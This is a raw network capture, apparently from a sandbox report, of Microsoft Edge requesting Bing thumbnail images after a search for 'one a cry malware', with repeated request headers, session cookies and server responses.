date: Thu, 17 Oct 2024 21:04:11 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199051.1491afab
GET

https://www.bing.com/th?id=OSK.00247bdcf0be5e1db5b3c0f27d1660c8&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /th?id=OSK.00247bdcf0be5e1db5b3c0f27d1660c8&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=one+a+cry+malware&FORM=AWRE
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QWthbWFp"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 3641
date: Thu, 17 Oct 2024 21:04:11 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199051.1491afac
GET

https://www.bing.com/th?id=OSK.3ee85b6d2a8498e38dac09a50c7972ab&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /th?id=OSK.3ee85b6d2a8498e38dac09a50c7972ab&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=one+a+cry+malware&FORM=AWRE
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QWthbWFp"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 9671
date: Thu, 17 Oct 2024 21:04:11 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199051.1491afad
GET

https://www.bing.com/th?id=OSK.371c63b2e5b0f2cd37afb5405d102d1e&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /th?id=OSK.371c63b2e5b0f2cd37afb5405d102d1e&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=one+a+cry+malware&FORM=AWRE
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QWthbWFp"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 3361
date: Thu, 17 Oct 2024 21:04:11 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199051.1491afa7
GET

https://www.bing.com/th?id=OSK.f71bf2f5bf7957c582296c1915f4c998&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /th?id=OSK.f71bf2f5bf7957c582296c1915f4c998&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=one+a+cry+malware&FORM=AWRE
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QWthbWFp"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 3104
date: Thu, 17 Oct 2024 21:04:11 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199051.1491afa9
GET

https://www.bing.com/th?id=OSK.GDRXDToOZpCrTWAeulsa6m87XdJrmbECxfXlGwm3TLs&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /th?id=OSK.GDRXDToOZpCrTWAeulsa6m87XdJrmbECxfXlGwm3TLs&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=one+a+cry+malware&FORM=AWRE
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QWthbWFp"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 5629
date: Thu, 17 Oct 2024 21:04:11 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199051.1491afaa
GET

https://www.bing.com/th?id=OSK.635a049efdf475982094a6f82b117047&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /th?id=OSK.635a049efdf475982094a6f82b117047&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=one+a+cry+malware&FORM=AWRE
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Thu, 17 Oct 2024 21:04:11 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199051.1491af8d
GET

https://www.bing.com/th?id=OSK.5ad10e8f557273961481b3019b368763&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /th?id=OSK.5ad10e8f557273961481b3019b368763&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=one+a+cry+malware&FORM=AWRE
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb

Response

HTTP/2.0 200

content-length: 2166
content-type: application/json; charset=utf-8
cache-control: private, max-age=300
content-encoding: gzip
vary: Accept-Encoding
x-eventid: 67117bcb36f74b2889dbcbf71d7241cc
x-as-setsessionmarket: en-gb
